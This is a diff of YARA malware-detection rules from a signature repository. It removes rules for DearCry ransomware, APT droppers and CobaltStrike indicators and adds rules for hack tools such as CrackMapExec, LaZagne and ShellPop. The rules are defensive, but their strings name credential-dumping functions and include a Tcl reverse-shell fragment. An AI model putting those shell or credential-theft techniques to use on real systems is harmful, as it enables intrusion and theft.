-		hash3 = "feb3e6d30ba573ba23f3bd1291ca173b7879706d1fe039c34d53a4fdcdf33ede"
+		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$x1 = ".TIF .TIFF .PDF .XLS .XLSX .XLTM .PS .PPS .PPT .PPTX .DOC .DOCX .LOG .MSG .RTF .TEX .TXT .CAD .WPS .EML .INI .CSS .HTM .HTML  .XHTML .JS .JSP .PHP .KEYCHAIN .PEM .SQL .APK .APP .BAT .CGI .ASPX .CER .CFM .C .CPP .GO .CONFIG .PL .PY .DWG .XML .JPG .BMP .PNG .EXE .DLL .CAD .AVI .H.CSV .DAT .ISO .PST .PGD  .7Z .RAR .ZIP .ZIPX .TAR .PDB .BIN .DB .MDB .MDF .BAK .LOG .EDB .STM .DBF .ORA .GPG .EDB .MFS" ascii
-		$s1 = "create rsa error" ascii fullword
-		$s2 = "DEARCRY!" ascii fullword
-		$s4 = "/readme.txt" ascii fullword
-		$s5 = "msupdate" ascii fullword
-		$s6 = "Your file has been encrypted!" ascii fullword
-		$s7 = "%c:\\%s" ascii fullword
-		$s8 = "C:\\Users\\john\\" ascii
-		$s9 = "EncryptFile.exe.pdb" ascii
+		$ = "\\\\.\\pipe\\%s%s%d"
+		$ = "%s\\pipe\\%s%s%d%s"
+		$ = "\\ADMIN$\\System32\\%s%s"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 1MB and filesize < 2MB and ( 1 of ( $x* ) or 3 of them ) or 5 of them
+		1 of them
 }
-rule SIGNATURE_BASE_MAL_CRIME_RANSOM_Dearcry_Mar21_1 : FILE
+rule SIGNATURE_BASE_Crackmapexec_EXE : FILE
 {
 	meta:
-		description = "Detects DearCry Ransomware affecting Exchange servers"
+		description = "Detects CrackMapExec hack tool"
 		author = "Florian Roth (Nextron Systems)"
-		id = "96cd2fe8-8bb9-5a3b-9bf1-c63a1148a817"
-		date = "2021-03-12"
-		modified = "2023-12-05"
-		reference = "https://twitter.com/phillip_misner/status/1370197696280027136"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_dearcry_ransom.yar#L29-L53"
+		id = "9fcfba98-7ba1-5810-99b7-62ad2b1aa4c0"
+		date = "2018-04-06"
+		modified = "2025-04-14"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L4139-L4155"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "c4af7c29e917078f8658aca68ec95f8a03934f42c81fdd421639437e24f304bc"
-		score = 75
+		logic_hash = "fa05fa41d6aaed45a9b44806a310fdb584874f7eb382e576b36e6d1db87cef88"
+		score = 85
 		quality = 85
 		tags = "FILE"
-		hash1 = "2b9838da7edb0decd32b086e47a31e8f5733b5981ad8247a2f9508e232589bff"
-		hash2 = "e044d9f2d0f1260c3f4a543a1e67f33fcac265be114a1b135fd575b860d2b8c6"
-		hash3 = "feb3e6d30ba573ba23f3bd1291ca173b7879706d1fe039c34d53a4fdcdf33ede"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "371f104b7876b9080c519510879235f36edb6668097de475949b84ab72ee9a9a"
 
 	strings:
-		$s1 = "dear!!!" ascii fullword
-		$s2 = "EncryptFile.exe.pdb" ascii fullword
-		$s3 = "/readme.txt" ascii fullword
-		$s4 = "C:\\Users\\john\\" ascii
-		$s5 = "And please send me the following hash!" ascii fullword
-		$op1 = { 68 e0 30 52 00 6a 41 68 a5 00 00 00 6a 22 e8 81 d0 f8 ff 83 c4 14 33 c0 5e }
-		$op2 = { 68 78 6a 50 00 6a 65 6a 74 6a 10 e8 d9 20 fd ff 83 c4 14 33 c0 5e }
-		$op3 = { 31 40 00 13 31 40 00 a4 31 40 00 41 32 40 00 5f 33 40 00 e5 }
+		$s1 = "core.scripts.secretsdump(" ascii
+		$s2 = "core.scripts.samrdump(" ascii
+		$s3 = "core.uacdump(" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 4000KB and 3 of them or 5 of them
+		uint16( 0 ) == 0x5a4d and filesize < 10000KB and 2 of them
 }
-rule SIGNATURE_BASE_Mal_Dropper_Httpexe_From_CAB : FILE
+
+rule SIGNATURE_BASE_SUSP_Imphash_Passrevealer_PY_EXE : FILE
 {
 	meta:
-		description = "Detects a dropper from a CAB file mentioned in the article"
+		description = "Detects an imphash used by password revealer and hack tools (some false positives with hardware driver installers)"
 		author = "Florian Roth (Nextron Systems)"
-		id = "f67c13e9-67e7-56aa-8ced-55e9bb814971"
-		date = "2016-05-25"
-		modified = "2023-12-05"
-		reference = "https://goo.gl/13Wgy1"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_danti_svcmondr.yar#L10-L25"
+		id = "9462dfc4-2feb-591d-ac0c-ba02f093c216"
+		date = "2018-04-06"
+		modified = "2021-11-09"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L4157-L4175"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "d114a3ab348bba49a78852b87b712908bc974bf35a2b841099a232e761cad8f2"
-		score = 60
+		logic_hash = "684e901eebf47e2bd8b25fd302963c2761376ce4754d74f9e6f1eb3024c89144"
+		score = 40
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "9e7e5f70c4b32a4d5e8c798c26671843e76bb4bd5967056a822e982ed36e047b"
+		hash1 = "371f104b7876b9080c519510879235f36edb6668097de475949b84ab72ee9a9a"
 
 	strings:
-		$s1 = "029.Hdl" fullword ascii
-		$s2 = "http.exe" fullword ascii
+		$fp1 = "Assmann Electronic GmbH" ascii wide
+		$fp2 = "Oculus VR" ascii wide
+		$fp3 = "efm8load" ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 1000KB and ( all of ( $s* ) ) )
+		uint16( 0 ) == 0x5a4d and filesize < 10000KB and pe.imphash ( ) == "ed61beebc8d019dd9bec823e2d694afd" and not 1 of ( $fp* )
 }
-rule SIGNATURE_BASE_Mal_Http_EXE : FILE
+rule SIGNATURE_BASE_MAL_Unknown_Pwdumper_Apr18_3 : FILE
 {
 	meta:
-		description = "Detects trojan from APT report named http.exe"
+		description = "Detects sample from unknown sample set - IL origin"
 		author = "Florian Roth (Nextron Systems)"
-		id = "bcae9920-56ea-54a1-857b-70c275090e19"
-		date = "2016-05-25"
-		modified = "2023-01-27"
-		reference = "https://goo.gl/13Wgy1"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_danti_svcmondr.yar#L27-L58"
+		id = "2431d562-dcd8-5d21-8406-7d2567b6eca9"
+		date = "2018-04-06"
+		modified = "2025-04-14"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L4177-L4196"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "0e28b64bbfd2b6d40f4bd82373624d22df3d5c45c22d7155747f0ff33976207d"
-		score = 80
+		logic_hash = "bf0dff02bdfa239336b2bc865f2a9aed6d20cafb059caa87a60aa30269dd94b5"
+		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "ad191d1d18841f0c5e48a5a1c9072709e2dd6359a6f6d427e0de59cfcd1d9666"
+		hash1 = "d435e7b6f040a186efeadb87dd6d9a14e038921dc8b8658026a90ae94b4c8b05"
+		hash2 = "8c35c71838f34f7f7a40bf06e1d2e14d58d9106e6d4e6f6e9af732511a126276"
 
 	strings:
-		$x1 = "Content-Disposition: form-data; name=\"file1\"; filename=\"%s\"" fullword ascii
-		$x2 = "%ALLUSERSPROFILE%\\Accessories\\wordpade.exe" fullword ascii
-		$x3 = "\\dumps.dat" ascii
-		$x4 = "\\wordpade.exe" ascii
-		$x5 = "\\%s|%s|4|%d|%4d-%02d-%02d %02d:%02d:%02d|" ascii
-		$x6 = "\\%s|%s|5|%d|%4d-%02d-%02d %02d:%02d:%02d|" ascii
-		$x7 = "cKaNBh9fnmXgJcSBxx5nFS+8s7abcQ==" fullword ascii
-		$x8 = "cKaNBhFLn1nXMcCR0RlbMQ==" fullword ascii
-		$s1 = "SELECT * FROM moz_logins;" fullword ascii
-		$s2 = "makescr.dat" fullword ascii
-		$s3 = "%s\\Mozilla\\Firefox\\profiles.ini" fullword ascii
-		$s4 = "?moz-proxy://" ascii
-		$s5 = "[%s-%s] Title: %s" fullword ascii
-		$s6 = "Cforeign key mismatch - \"%w\" referencing \"%w\"" fullword ascii
-		$s7 = "Windows 95 SR2" fullword ascii
-		$s8 = "\\|%s|0|0|" ascii
+		$s1 = "loaderx86.dll" fullword ascii
+		$s2 = "tcpsvcs.exe" fullword wide
+		$s3 = "%Program Files, Common FOLDER%" fullword wide
+		$s4 = "%AllUsers, ApplicationData FOLDER%" fullword wide
+		$s5 = "loaderx86" fullword ascii
+		$s6 = "TNtDllHook$" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 2000KB and ( 1 of ( $x* ) and 2 of ( $s* ) ) ) or ( 3 of ( $x* ) )
+		uint16( 0 ) == 0x5a4d and filesize < 3000KB and all of them
 }
-rule SIGNATURE_BASE_Mal_Potplayer_DLL : FILE
+
+rule SIGNATURE_BASE_Processinjector_Gen : HIGHVOL FILE
 {
 	meta:
-		description = "Detects a malicious PotPlayer.dll"
+		description = "Detects a process injection utility that can be used ofr good and bad purposes"
 		author = "Florian Roth (Nextron Systems)"
-		id = "71d34266-63e0-5a97-9a80-952be917641a"
-		date = "2016-05-25"
-		modified = "2023-12-05"
-		reference = "https://goo.gl/13Wgy1"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_danti_svcmondr.yar#L60-L77"
+		id = "9b0b6ac7-8432-5f93-b389-c2356ec75113"
+		date = "2018-04-23"
+		modified = "2025-04-14"
+		reference = "https://github.com/cuckoosandbox/monitor/blob/master/bin/inject.c"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L4198-L4219"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "1d1b68fa8de2e4ddfa71cbcd5e166181370172cc8a3167ade2da393e4f7998f1"
-		score = 70
+		logic_hash = "90d200e79c97911b105e592549bc2c04fb09ce841413c30117d421b45bb9988c"
+		score = 60
 		quality = 85
-		tags = "FILE"
+		tags = "HIGHVOL, FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "705409bc11fb45fa3c4e2fa9dd35af7d4613e52a713d9c6ea6bc4baff49aa74a"
+		hash1 = "456c1c25313ce2e2eedf24fdcd4d37048bcfff193f6848053cbb3b5e82cd527d"
 
 	strings:
-		$x1 = "C:\\Users\\john\\Desktop\\PotPlayer\\Release\\PotPlayer.pdb" fullword ascii
-		$s3 = "PotPlayer.dll" fullword ascii
-		$s4 = "\\update.dat" ascii
+		$x1 = "Error injecting remote thread in process:" fullword ascii
+		$s5 = "[-] Error getting access to process: %ld!" fullword ascii
+		$s6 = "--process-name <name>  Process name to inject" fullword ascii
+		$s12 = "No injection target has been provided!" fullword ascii
+		$s17 = "[-] An app path is required when not injecting!" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 200KB and $x1 or all of ( $s* )
+		uint16( 0 ) == 0x5a4d and filesize < 50KB and ( pe.imphash ( ) == "d27e0fa013d7ae41be12aaf221e41f9b" or 1 of them ) or 3 of them
 }
-rule SIGNATURE_BASE_Cobaltstrike_C2_Host_Indicator : FILE
+rule SIGNATURE_BASE_Lazagne_PW_Dumper
 {
 	meta:
-		description = "Detects CobaltStrike C2 host artifacts"
-		author = "yara@s3c.za.net"
-		id = "7f15ee30-664e-59b8-9e31-35d88e58a45e"
-		date = "2019-08-16"
-		modified = "2023-12-05"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_cobaltstrike_evasive.yar#L1-L14"
+		description = "Detects Lazagne PW Dumper"
+		author = "Markus Neis / Florian Roth"
+		id = "1904029e-9336-5278-ae2e-4bc853316600"
+		date = "2018-03-22"
+		modified = "2025-04-14"
+		reference = "https://github.com/AlessandroZ/LaZagne/releases/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L4221-L4235"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "4761e282e9473ba665a597894ed514d057309703a7d5b4e462ef0e779bbb8c39"
-		score = 60
-		quality = 65
-		tags = "FILE"
+		logic_hash = "2eac81d5cecdaca7eeaa83be70a688a595f8bbf54679ee565ba325b9e384552b"
+		score = 70
+		quality = 85
+		tags = ""
 
 	strings:
-		$c2_indicator_fp = "#Host: %s"
-		$c2_indicator = "#Host:"
+		$s1 = "Crypto.Hash" fullword ascii
+		$s2 = "laZagne" fullword ascii
+		$s3 = "impacket.winregistry" fullword ascii
 
 	condition:
-		$c2_indicator and not $c2_indicator_fp and not uint32( 0 ) == 0x0a786564 and not uint32( 0 ) == 0x0a796564
+		3 of them
 }
-rule SIGNATURE_BASE_Cobaltstrike_Sleep_Decoder_Indicator
+rule SIGNATURE_BASE_HKTL_Shellpop_Tclsh : FILE
 {
 	meta:
-		description = "Detects CobaltStrike sleep_mask decoder"
-		author = "yara@s3c.za.net"
-		id = "d5b53d68-55f9-5837-9b0c-e7be2f3bd072"
-		date = "2021-07-19"
-		modified = "2023-12-05"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_cobaltstrike_evasive.yar#L16-L26"
+		description = "Detects suspicious TCLsh popshell"
+		author = "Tobias Michalski"
+		id = "24f6b626-383e-54c9-abd4-bd67c37af937"
+		date = "2018-05-18"
+		modified = "2025-04-14"
+		reference = "https://github.com/0x00-0x00/ShellPop"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L4237-L4249"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "f3243c326df18edbd15c2d9120379588e61709efb9295b9584c0565c04ee38a5"
-		score = 75
+		logic_hash = "622805e8067f5158d82783971dcf31e8db05f1d52a38bd1ec3e76ddbbd78032b"
+		score = 65
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		hash1 = "9f49d76d70d14bbe639a3c16763d3b4bee92c622ecb1c351cb4ea4371561e133"
 
 	strings:
-		$sleep_decoder = { 48 89 5C 24 08 48 89 6C 24 10 48 89 74 24 18 57 48 83 EC 20 4C 8B 51 08 41 8B F0 48 8B EA 48 8B D9 45 8B 0A 45 8B 5A 04 4D 8D 52 08 45 85 C9 }
+		$s1 = "{ puts -nonewline $s \"shell>\";flush $s;gets $s c;set e \"exec $c\";if" ascii
 
 	condition:
-		$sleep_decoder
+		filesize < 1KB and 1 of them
 }
-rule SIGNATURE_BASE_Cobaltstrike_C2_Encoded_XOR_Config_Indicator
+rule SIGNATURE_BASE_HKTL_Shellpop_Ruby : FILE
 {
 	meta:
-		description = "Detects CobaltStrike C2 encoded profile configuration"
-		author = "yara@s3c.za.net"
-		id = "8e33c63d-eaba-5851-88f4-ef7261a0a618"
-		date = "2021-07-08"
-		modified = "2023-12-05"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_cobaltstrike_evasive.yar#L28-L295"
+		description = "Detects suspicious ruby shellpop"
+		author = "Tobias Michalski"
+		id = "cb3a93d5-02a1-5a49-b37e-3f9312b993ea"
+		date = "2018-05-18"
+		modified = "2025-04-14"
+		reference = "https://github.com/0x00-0x00/ShellPop"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L4251-L4263"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "6b25ee9064e925c183ef7599c95ecffce48c7f96eea714fa5f6441b21716277e"
-		score = 75
-		quality = 60
-		tags = ""
+		logic_hash = "aa076540ef01d04117d3340f4d84c21f79acfc558ed4aa585d801b6a6bc797a2"
+		score = 65
+		quality = 85
+		tags = "FILE"
+		hash1 = "6b425b37f3520fd8c778928cc160134a293db0ce6d691e56a27894354b04f783"
 
 	strings:
-		$s000 = { 00 01 00 01 00 02 ?? ?? 00 02 00 01 00 02 ?? ?? 00 03 00 02 00 04 ?? ?? ?? ?? 00 04 00 02 00 04 ?? ?? ?? ?? 00 05 00 01 00 02 ?? ?? }
-		$s001 = { 01 00 01 00 01 03 ?? ?? 01 03 01 00 01 03 ?? ?? 01 02 01 03 01 05 ?? ?? ?? ?? 01 05 01 03 01 05 ?? ?? ?? ?? 01 04 01 00 01 03 ?? ?? }
-		$s002 = { 02 03 02 03 02 00 ?? ?? 02 00 02 03 02 00 ?? ?? 02 01 02 00 02 06 ?? ?? ?? ?? 02 06 02 00 02 06 ?? ?? ?? ?? 02 07 02 03 02 00 ?? ?? }
-		$s003 = { 03 02 03 02 03 01 ?? ?? 03 01 03 02 03 01 ?? ?? 03 00 03 01 03 07 ?? ?? ?? ?? 03 07 03 01 03 07 ?? ?? ?? ?? 03 06 03 02 03 01 ?? ?? }
-		$s004 = { 04 05 04 05 04 06 ?? ?? 04 06 04 05 04 06 ?? ?? 04 07 04 06 04 00 ?? ?? ?? ?? 04 00 04 06 04 00 ?? ?? ?? ?? 04 01 04 05 04 06 ?? ?? }
-		$s005 = { 05 04 05 04 05 07 ?? ?? 05 07 05 04 05 07 ?? ?? 05 06 05 07 05 01 ?? ?? ?? ?? 05 01 05 07 05 01 ?? ?? ?? ?? 05 00 05 04 05 07 ?? ?? }
-		$s006 = { 06 07 06 07 06 04 ?? ?? 06 04 06 07 06 04 ?? ?? 06 05 06 04 06 02 ?? ?? ?? ?? 06 02 06 04 06 02 ?? ?? ?? ?? 06 03 06 07 06 04 ?? ?? }
-		$s007 = { 07 06 07 06 07 05 ?? ?? 07 05 07 06 07 05 ?? ?? 07 04 07 05 07 03 ?? ?? ?? ?? 07 03 07 05 07 03 ?? ?? ?? ?? 07 02 07 06 07 05 ?? ?? }
-		$s008 = { 08 09 08 09 08 0A ?? ?? 08 0A 08 09 08 0A ?? ?? 08 0B 08 0A 08 0C ?? ?? ?? ?? 08 0C 08 0A 08 0C ?? ?? ?? ?? 08 0D 08 09 08 0A ?? ?? }
-		$s009 = { 09 08 09 08 09 0B ?? ?? 09 0B 09 08 09 0B ?? ?? 09 0A 09 0B 09 0D ?? ?? ?? ?? 09 0D 09 0B 09 0D ?? ?? ?? ?? 09 0C 09 08 09 0B ?? ?? }
-		$s010 = { 0A 0B 0A 0B 0A 08 ?? ?? 0A 08 0A 0B 0A 08 ?? ?? 0A 09 0A 08 0A 0E ?? ?? ?? ?? 0A 0E 0A 08 0A 0E ?? ?? ?? ?? 0A 0F 0A 0B 0A 08 ?? ?? }
-		$s011 = { 0B 0A 0B 0A 0B 09 ?? ?? 0B 09 0B 0A 0B 09 ?? ?? 0B 08 0B 09 0B 0F ?? ?? ?? ?? 0B 0F 0B 09 0B 0F ?? ?? ?? ?? 0B 0E 0B 0A 0B 09 ?? ?? }
-		$s012 = { 0C 0D 0C 0D 0C 0E ?? ?? 0C 0E 0C 0D 0C 0E ?? ?? 0C 0F 0C 0E 0C 08 ?? ?? ?? ?? 0C 08 0C 0E 0C 08 ?? ?? ?? ?? 0C 09 0C 0D 0C 0E ?? ?? }
-		$s013 = { 0D 0C 0D 0C 0D 0F ?? ?? 0D 0F 0D 0C 0D 0F ?? ?? 0D 0E 0D 0F 0D 09 ?? ?? ?? ?? 0D 09 0D 0F 0D 09 ?? ?? ?? ?? 0D 08 0D 0C 0D 0F ?? ?? }
-		$s014 = { 0E 0F 0E 0F 0E 0C ?? ?? 0E 0C 0E 0F 0E 0C ?? ?? 0E 0D 0E 0C 0E 0A ?? ?? ?? ?? 0E 0A 0E 0C 0E 0A ?? ?? ?? ?? 0E 0B 0E 0F 0E 0C ?? ?? }
-		$s015 = { 0F 0E 0F 0E 0F 0D ?? ?? 0F 0D 0F 0E 0F 0D ?? ?? 0F 0C 0F 0D 0F 0B ?? ?? ?? ?? 0F 0B 0F 0D 0F 0B ?? ?? ?? ?? 0F 0A 0F 0E 0F 0D ?? ?? }
-		$s016 = { 10 11 10 11 10 12 ?? ?? 10 12 10 11 10 12 ?? ?? 10 13 10 12 10 14 ?? ?? ?? ?? 10 14 10 12 10 14 ?? ?? ?? ?? 10 15 10 11 10 12 ?? ?? }
-		$s017 = { 11 10 11 10 11 13 ?? ?? 11 13 11 10 11 13 ?? ?? 11 12 11 13 11 15 ?? ?? ?? ?? 11 15 11 13 11 15 ?? ?? ?? ?? 11 14 11 10 11 13 ?? ?? }
-		$s018 = { 12 13 12 13 12 10 ?? ?? 12 10 12 13 12 10 ?? ?? 12 11 12 10 12 16 ?? ?? ?? ?? 12 16 12 10 12 16 ?? ?? ?? ?? 12 17 12 13 12 10 ?? ?? }
-		$s019 = { 13 12 13 12 13 11 ?? ?? 13 11 13 12 13 11 ?? ?? 13 10 13 11 13 17 ?? ?? ?? ?? 13 17 13 11 13 17 ?? ?? ?? ?? 13 16 13 12 13 11 ?? ?? }
-		$s020 = { 14 15 14 15 14 16 ?? ?? 14 16 14 15 14 16 ?? ?? 14 17 14 16 14 10 ?? ?? ?? ?? 14 10 14 16 14 10 ?? ?? ?? ?? 14 11 14 15 14 16 ?? ?? }
-		$s021 = { 15 14 15 14 15 17 ?? ?? 15 17 15 14 15 17 ?? ?? 15 16 15 17 15 11 ?? ?? ?? ?? 15 11 15 17 15 11 ?? ?? ?? ?? 15 10 15 14 15 17 ?? ?? }
-		$s022 = { 16 17 16 17 16 14 ?? ?? 16 14 16 17 16 14 ?? ?? 16 15 16 14 16 12 ?? ?? ?? ?? 16 12 16 14 16 12 ?? ?? ?? ?? 16 13 16 17 16 14 ?? ?? }
-		$s023 = { 17 16 17 16 17 15 ?? ?? 17 15 17 16 17 15 ?? ?? 17 14 17 15 17 13 ?? ?? ?? ?? 17 13 17 15 17 13 ?? ?? ?? ?? 17 12 17 16 17 15 ?? ?? }
-		$s024 = { 18 19 18 19 18 1A ?? ?? 18 1A 18 19 18 1A ?? ?? 18 1B 18 1A 18 1C ?? ?? ?? ?? 18 1C 18 1A 18 1C ?? ?? ?? ?? 18 1D 18 19 18 1A ?? ?? }
-		$s025 = { 19 18 19 18 19 1B ?? ?? 19 1B 19 18 19 1B ?? ?? 19 1A 19 1B 19 1D ?? ?? ?? ?? 19 1D 19 1B 19 1D ?? ?? ?? ?? 19 1C 19 18 19 1B ?? ?? }
-		$s026 = { 1A 1B 1A 1B 1A 18 ?? ?? 1A 18 1A 1B 1A 18 ?? ?? 1A 19 1A 18 1A 1E ?? ?? ?? ?? 1A 1E 1A 18 1A 1E ?? ?? ?? ?? 1A 1F 1A 1B 1A 18 ?? ?? }
-		$s027 = { 1B 1A 1B 1A 1B 19 ?? ?? 1B 19 1B 1A 1B 19 ?? ?? 1B 18 1B 19 1B 1F ?? ?? ?? ?? 1B 1F 1B 19 1B 1F ?? ?? ?? ?? 1B 1E 1B 1A 1B 19 ?? ?? }
-		$s028 = { 1C 1D 1C 1D 1C 1E ?? ?? 1C 1E 1C 1D 1C 1E ?? ?? 1C 1F 1C 1E 1C 18 ?? ?? ?? ?? 1C 18 1C 1E 1C 18 ?? ?? ?? ?? 1C 19 1C 1D 1C 1E ?? ?? }
-		$s029 = { 1D 1C 1D 1C 1D 1F ?? ?? 1D 1F 1D 1C 1D 1F ?? ?? 1D 1E 1D 1F 1D 19 ?? ?? ?? ?? 1D 19 1D 1F 1D 19 ?? ?? ?? ?? 1D 18 1D 1C 1D 1F ?? ?? }
-		$s030 = { 1E 1F 1E 1F 1E 1C ?? ?? 1E 1C 1E 1F 1E 1C ?? ?? 1E 1D 1E 1C 1E 1A ?? ?? ?? ?? 1E 1A 1E 1C 1E 1A ?? ?? ?? ?? 1E 1B 1E 1F 1E 1C ?? ?? }
-		$s031 = { 1F 1E 1F 1E 1F 1D ?? ?? 1F 1D 1F 1E 1F 1D ?? ?? 1F 1C 1F 1D 1F 1B ?? ?? ?? ?? 1F 1B 1F 1D 1F 1B ?? ?? ?? ?? 1F 1A 1F 1E 1F 1D ?? ?? }
-		$s032 = { 20 21 20 21 20 22 ?? ?? 20 22 20 21 20 22 ?? ?? 20 23 20 22 20 24 ?? ?? ?? ?? 20 24 20 22 20 24 ?? ?? ?? ?? 20 25 20 21 20 22 ?? ?? }
-		$s033 = { 21 20 21 20 21 23 ?? ?? 21 23 21 20 21 23 ?? ?? 21 22 21 23 21 25 ?? ?? ?? ?? 21 25 21 23 21 25 ?? ?? ?? ?? 21 24 21 20 21 23 ?? ?? }
-		$s034 = { 22 23 22 23 22 20 ?? ?? 22 20 22 23 22 20 ?? ?? 22 21 22 20 22 26 ?? ?? ?? ?? 22 26 22 20 22 26 ?? ?? ?? ?? 22 27 22 23 22 20 ?? ?? }
-		$s035 = { 23 22 23 22 23 21 ?? ?? 23 21 23 22 23 21 ?? ?? 23 20 23 21 23 27 ?? ?? ?? ?? 23 27 23 21 23 27 ?? ?? ?? ?? 23 26 23 22 23 21 ?? ?? }
-		$s036 = { 24 25 24 25 24 26 ?? ?? 24 26 24 25 24 26 ?? ?? 24 27 24 26 24 20 ?? ?? ?? ?? 24 20 24 26 24 20 ?? ?? ?? ?? 24 21 24 25 24 26 ?? ?? }
-		$s037 = { 25 24 25 24 25 27 ?? ?? 25 27 25 24 25 27 ?? ?? 25 26 25 27 25 21 ?? ?? ?? ?? 25 21 25 27 25 21 ?? ?? ?? ?? 25 20 25 24 25 27 ?? ?? }
-		$s038 = { 26 27 26 27 26 24 ?? ?? 26 24 26 27 26 24 ?? ?? 26 25 26 24 26 22 ?? ?? ?? ?? 26 22 26 24 26 22 ?? ?? ?? ?? 26 23 26 27 26 24 ?? ?? }
-		$s039 = { 27 26 27 26 27 25 ?? ?? 27 25 27 26 27 25 ?? ?? 27 24 27 25 27 23 ?? ?? ?? ?? 27 23 27 25 27 23 ?? ?? ?? ?? 27 22 27 26 27 25 ?? ?? }
-		$s040 = { 28 29 28 29 28 2A ?? ?? 28 2A 28 29 28 2A ?? ?? 28 2B 28 2A 28 2C ?? ?? ?? ?? 28 2C 28 2A 28 2C ?? ?? ?? ?? 28 2D 28 29 28 2A ?? ?? }
-		$s041 = { 29 28 29 28 29 2B ?? ?? 29 2B 29 28 29 2B ?? ?? 29 2A 29 2B 29 2D ?? ?? ?? ?? 29 2D 29 2B 29 2D ?? ?? ?? ?? 29 2C 29 28 29 2B ?? ?? }
-		$s042 = { 2A 2B 2A 2B 2A 28 ?? ?? 2A 28 2A 2B 2A 28 ?? ?? 2A 29 2A 28 2A 2E ?? ?? ?? ?? 2A 2E 2A 28 2A 2E ?? ?? ?? ?? 2A 2F 2A 2B 2A 28 ?? ?? }
-		$s043 = { 2B 2A 2B 2A 2B 29 ?? ?? 2B 29 2B 2A 2B 29 ?? ?? 2B 28 2B 29 2B 2F ?? ?? ?? ?? 2B 2F 2B 29 2B 2F ?? ?? ?? ?? 2B 2E 2B 2A 2B 29 ?? ?? }
-		$s044 = { 2C 2D 2C 2D 2C 2E ?? ?? 2C 2E 2C 2D 2C 2E ?? ?? 2C 2F 2C 2E 2C 28 ?? ?? ?? ?? 2C 28 2C 2E 2C 28 ?? ?? ?? ?? 2C 29 2C 2D 2C 2E ?? ?? }
-		$s045 = { 2D 2C 2D 2C 2D 2F ?? ?? 2D 2F 2D 2C 2D 2F ?? ?? 2D 2E 2D 2F 2D 29 ?? ?? ?? ?? 2D 29 2D 2F 2D 29 ?? ?? ?? ?? 2D 28 2D 2C 2D 2F ?? ?? }
-		$s046 = { 2E 2F 2E 2F 2E 2C ?? ?? 2E 2C 2E 2F 2E 2C ?? ?? 2E 2D 2E 2C 2E 2A ?? ?? ?? ?? 2E 2A 2E 2C 2E 2A ?? ?? ?? ?? 2E 2B 2E 2F 2E 2C ?? ?? }
-		$s047 = { 2F 2E 2F 2E 2F 2D ?? ?? 2F 2D 2F 2E 2F 2D ?? ?? 2F 2C 2F 2D 2F 2B ?? ?? ?? ?? 2F 2B 2F 2D 2F 2B ?? ?? ?? ?? 2F 2A 2F 2E 2F 2D ?? ?? }
-		$s048 = { 30 31 30 31 30 32 ?? ?? 30 32 30 31 30 32 ?? ?? 30 33 30 32 30 34 ?? ?? ?? ?? 30 34 30 32 30 34 ?? ?? ?? ?? 30 35 30 31 30 32 ?? ?? }
